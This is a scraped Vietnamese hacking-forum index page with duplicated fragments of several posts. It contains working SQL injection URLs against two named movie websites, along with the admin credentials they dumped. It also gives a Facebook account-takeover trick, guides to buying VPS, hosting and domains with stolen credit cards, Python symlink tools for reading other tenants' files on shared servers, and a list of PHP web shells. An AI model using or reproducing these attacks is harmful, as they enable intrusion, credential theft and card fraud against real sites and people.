Thấy bên kia nó hide cũng cao, nghĩ còn ăn được nên leech cho AE chiến 
AE nào ăn được thì để lại tý kinh nguyệt nhá
AE nào ăn được thì để lại tý kinh nguyệt nhá
TUT VPS linux ccv thực vật
VPS CLOUD JP
Nguyên liệu:CCV Thực vật ,có bl càng tốt
K socks,VN cứ thế táng
Mail:Tùy
Đâm phát là qua luôn
Đăng kí xong có mail verify acc
Xong vào creat vps mới cần nhập CC
Hàng nhật nên dùng Google Chrome dịch cho tiện
Xong thì connect thông qua SSH Client(đoạn này chưa biết làm)
Victim
Phần này ẩn 4 posts, bạn đang có 4 posts
Demo:
IP:210.152.137.65
chạy ubuntu
Pics:
Nguyên liệu:CCV Thực vật ,có bl càng tốt
K socks,VN cứ thế táng
Mail:Tùy
Đâm phát là qua luôn
Đăng kí xong có mail verify acc
Xong vào creat vps mới cần nhập CC
Hàng nhật nên dùng Google Chrome dịch cho tiện
Xong thì connect thông qua SSH Client(đoạn này chưa biết làm)
Victim
Phần này ẩn 4 posts, bạn đang có 4 posts
Demo:
IP:210.152.137.65
chạy ubuntu
Pics:
 | This image has been resized.Click to view original image |
Xem Thêm
Hack Site Phim www.123phim.net
Get version
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11-- -.html
Get table
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()-- -.html
Tất cả các table
admin,advertise,camnhan,cat_download,category,chan nel,counter,dienvien,download,favbox,mcategory,med ia,members,mobile,mobile_category,mobile_topinweek ,news,news_category,news_setting,nhipsong_links,ph im,phim_choice,poll_db,problems,requirment,rss_fee ds,section,shopping_category,suggest_stream,tag,te rms,user
Get column của admin
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_schema=database() and table_name=0x61646d696e-- -.html
Tất cả column của admin
id,uid,pwd,email,admin_email,report_email,feedback _email,support_email,info_email,legal_email
Get user và pass admin
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,group_concat(uid,0x7c,pwd),3,4,5,6,7,8,9,10,11 from admin-- -.html
Ta được
admin|admin
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11-- -.html
Get table
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables where table_schema=database()-- -.html
Tất cả các table
admin,advertise,camnhan,cat_download,category,chan nel,counter,dienvien,download,favbox,mcategory,med ia,members,mobile,mobile_category,mobile_topinweek ,news,news_category,news_setting,nhipsong_links,ph im,phim_choice,poll_db,problems,requirment,rss_fee ds,section,shopping_category,suggest_stream,tag,te rms,user
Get column của admin
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,group_concat(column_name),3,4,5,6,7,8,9,10,11 from information_schema.columns where table_schema=database() and table_name=0x61646d696e-- -.html
Tất cả column của admin
id,uid,pwd,email,admin_email,report_email,feedback _email,support_email,info_email,legal_email
Get user và pass admin
http://www.123phim.net/Song-hung-ky-di-36-36-Song-hung-ki-di-phim-4246 div 0 UNION SELECT 1,group_concat(uid,0x7c,pwd),3,4,5,6,7,8,9,10,11 from admin-- -.html
Ta được
admin|admin
Xem Thêm
[SQL] Check Phimck.com
Get version
Get table: table_user
Get column: user_name và user_password của table_user
Get data user_name và user_password
và kết quả đây
admin|51d31cdcc6bc148eed78adf4cda28331
Mã:
http://phimck.com/Phim-Online/'%20and%20(select%201%20from%20(select%20count(*),concat((select(select%20concat(version(),0x7c))%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)--%20-.html
Mã:
http://phimck.com/Phim-Online/'%20and+(select+1+from+(select+count(*),concat((select(select+concat(cast(table_name+as+char),0x7c))+from+information_schema.tables+where+table_schema=database()+limit+12,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)-- -.html
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(column_name+as+char),0x7c))+from+information_schema.columns+where+table_name=0x7461626c655f75736572+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--%20-.html
Mã:
http://phimck.com/Phim-Online/'%20+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(0x7c,user_name,0x7c,user_password,0x7c)+as+char),0x7e))+from+table_user+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)--+.html
admin|51d31cdcc6bc148eed78adf4cda28331
Xem Thêm
[TUT] How to Login in Facebook without Getting the Security Question 100% work
You got someone facebook id and password. If you try to login to that
account from your your system, it will ask to answer security question.
You can bypass this security.
Requirments:
slave IP address
* Go to http://www.ip2location.com
* and enter the IP address.
* It will show the country of slave.
* Now visit:
* http://www.samair.ru/
* Find the proxy IP address based on the slave's Counry.
* Set the proxy IP in mozilla
* Now login to facebook with id you got. you won't get Security
Question now.
Requirments:
slave IP address
* Go to http://www.ip2location.com
* and enter the IP address.
* It will show the country of slave.
* Now visit:
* http://www.samair.ru/
* Find the proxy IP address based on the slave's Counry.
* Set the proxy IP in mozilla
* Now login to facebook with id you got. you won't get Security
Question now.
Xem Thêm
Flood ChangUonDyU Chatbox (Bypass Anti Flood)
Flood này thì nhiều bạn biết rồi, nhưng đó là với server config chatbox:
$config['check_domain_reffer'] = false; // Kiem tra site gui yeu cau
Còn với server config:$config['check_chatbox_key'] = false; // Kiem tra tu khoa chat box
$config['check_domain_reffer'] = true; // Kiem tra site gui yeu cau
$config['check_chatbox_key'] = true; // Kiem tra tu khoa chat boxThì hãy xem clip bên trên và suy nghĩ xem Juno_okyo đã bypass Anti Flood của ChangUonDyU như nào nhé! :D
P/S: chân thành xin lỗi BeYeuGroup vì đã test chatbox mà ko báo trước :D.
Xem Thêm
Server Bypass via Symlink - Jumping in server
==================================================
#!/usr/bin/env python# devilzc0de.org (c) 2012import SimpleHTTPServerimport SocketServerimport osport = 13123if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://maho.com:" + str(port)) httpd.serve_forever()
http://pastebin.com/PddvszKC
Next u wil need to run the webs.py script by following command
open the site with port 13123
site.com:13123
User the tool to view folders where not have any permission to read inside
python xplor.py /var/www/index.php
View the files in no access folder .
python xplor.py /var/www/index.php
copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg
And yeah file it's here
Yeahh fucking access it's granted
Some thing u can do with those other scripts in perl
webs.pl
and
xplor.pl
enjoy it :)
As
we all know, symlinking it's on of greates methods for bypassing
server security, mean to read files of other site in same shared host.
For getting success with this tutorial are required the following things:
For getting success with this tutorial are required the following things:
- Python Installed on Server
- b374k.php shell
- And some scripts u will see below.
This idea have start from devilzc0de geeks and let me explain how it work.
here we are in folder
/var/www/here we are in folder
dono and trying to go into /www/
no permissions to go into /www .
before we got tired by trying the commands u must check if if python it's installed with command :
before we got tired by trying the commands u must check if if python it's installed with command :
python -h
Now take this python script and name it as
webs.py , It's a little python script who will open a new port on server SimpleHTTPServer ( python ) module. Default port from script it's 13123 .#!/usr/bin/env python# devilzc0de.org (c) 2012import SimpleHTTPServerimport SocketServerimport osport = 13123if __name__=='__main__': os.chdir('/') Handler = SimpleHTTPServer.SimpleHTTPRequestHandler httpd = SocketServer.TCPServer(("", port), Handler) print("Now open this server on webbrowser at port : " + str(port)) print("example: http://maho.com:" + str(port)) httpd.serve_forever()
python webs.py
open the site with port 13123
site.com:13123
Let's go with next method of symlink
server bypassing , like u see and into before post now i will explain a
new trick with an other tool.
http://www.flashcrew.in/2012/05/serv...umping-in.html
-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source
http://www.flashcrew.in/2012/05/serv...umping-in.html
-------------------------
Here we will talk about an other tool who use python permission to read other folders/ files in same server.
Tool called xplor.py and here it's the source
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os
def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()
if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)
target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)
sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
http://pastebin.com/WqmCE2sJ # devilzc0de.org (c) 2012
import sys
import os
def copyfile(source, dest, buffer_size=1024*1024):
if not hasattr(source, 'read'):
source = open(source, 'rb')
if not hasattr(dest, 'write'):
dest = open(dest, 'wb')
while 1:
copy_buffer = source.read(buffer_size)
if copy_buffer:
dest.write(copy_buffer)
else:
break
source.close()
dest.close()
if __name__=="__main__":
if not len(sys.argv) == 3 and not len(sys.argv) == 2:
sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
sys.stdout.write('ex : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
sys.exit(1)
target = sys.argv[1].replace("\\","/")
if os.path.isdir(target):
if not target.endswith("/"):
target = target + "/"
dir = os.listdir(target)
for d in dir:
fs = ""
if os.path.isdir(target + d):
fs = "[ DIR ]"
elif os.path.isfile(target + d):
fs = os.path.getsize(target + d)
fs = str(fs)
sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
elif os.path.isfile(target):
if len(sys.argv) == 3:
copyfile(target, sys.argv[2])
else:
f = open(target, "rb")
try:
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
while byte != "":
byte = f.read(1024)
sys.stdout.write(byte)
sys.stdout.flush()
finally:
f.close()
else:
sys.stdout.write("Can't found file or folder : " + target)
testing the script
python xplor.pyUser the tool to view folders where not have any permission to read inside
python xplor.py /var/www/index.php
View the files in no access folder .
python xplor.py /var/www/index.php
copy/ save ur file
python xplor.py /var/www/indro/ketek.jpg ketek.jpg
And yeah file it's here
Yeahh fucking access it's granted
Some thing u can do with those other scripts in perl
webs.pl
and
xplor.pl
enjoy it :)
Xem Thêm
Tut khai khác, up shell, local host windowns
Tut khai khác, up shell, local host windowns dành cho người bắt đầu học hack
trong video có nhiều câu kéo lủng củng, các bác bỏ quá cho tut dành cho newbie, pro tránh xa
http://www.mediafire.com/?uvj4iv00bg0conj
trong video có nhiều câu kéo lủng củng, các bác bỏ quá cho tut dành cho newbie, pro tránh xa
http://www.mediafire.com/?uvj4iv00bg0conj
Xem Thêm
Site Domain chất CCV
Site: udomain.net
|
Nguyên liệu: Sock 5 US + CCV
Site này trước đây Public chỉ để reg domain .vn
Giờ thì .VN đã nát nhưng các domain khác vẫn còn tốt
Hướng dẫn: reg như bình thường, xong thì active luôn
Demo: http://whois.domaintools.com/caodang.cd
Xem Thêm
Tổng hợp Shell và giới thiệu tính năng!
Nói đến local là nói đến shell, không có shell
thì chỉ local bằng niềm tin. Hôm nay soleil giới thiệu một số loại shell
thông dụng không thể thiếu trong local attack.
Một số shell thông dụng:
r57.php
R57 hiện nay đang là shell thông dụng, được sử dụng phổ biến nhất với hầu như là đầy đủ các tính năng.
c99.php
Nói
đến r57 cũng không thể không nhắc đến c99 với các thao tác có sẵn trên
shell mà không cần phải sử dụng lệnh: edit, del, insert, drop… đặc biệt
là có khả năng dump cơ sở dữ liệu!
byg.php
Byg hiện đang là shell mà được soleil sử dụng nhiều nhất với các chức năng có sẵn và thao tác dễ sử dụng
pass login: byg
telnet.php
Để
sử dụng shell cgi được thuận tiên hơn, soleil giới thiệu shell
telnet.pl. Chức năng hoàn toàn tương tự với con shell soleil.pin
Tuy nhiên cách thức sử dụng nó thì đơn giản hơn nhiều vì không phải sử dụng đến file .htaccess mà chỉ cần CHMOD nó về 755 là run ngon.
Fake symlink:
Get user:
Get user và domain
Shell này cần chmod về 755 trước khi sử dụng
Get all config
w.php
SSI
Backdoor.php
Netcut
zipcode.php
saoluu.php
Shell xml: Up shell đối với vbulletin
Shell.xml
Python.php
* Và rất nhiều shell khác với 1 số tính năng đặc biệt khác nữa.
...
Pass Unlock ( nếu có ): binhduong
Pass Unlock ( nếu có ): binhduong
Xem Thêm
Reseller hosting By VNGroup
Sock + Ccn , Mail Free
đâm xong 1 phút có info
site:http://glowhost.com/
đâm xong 1 phút có info
site:http://glowhost.com/
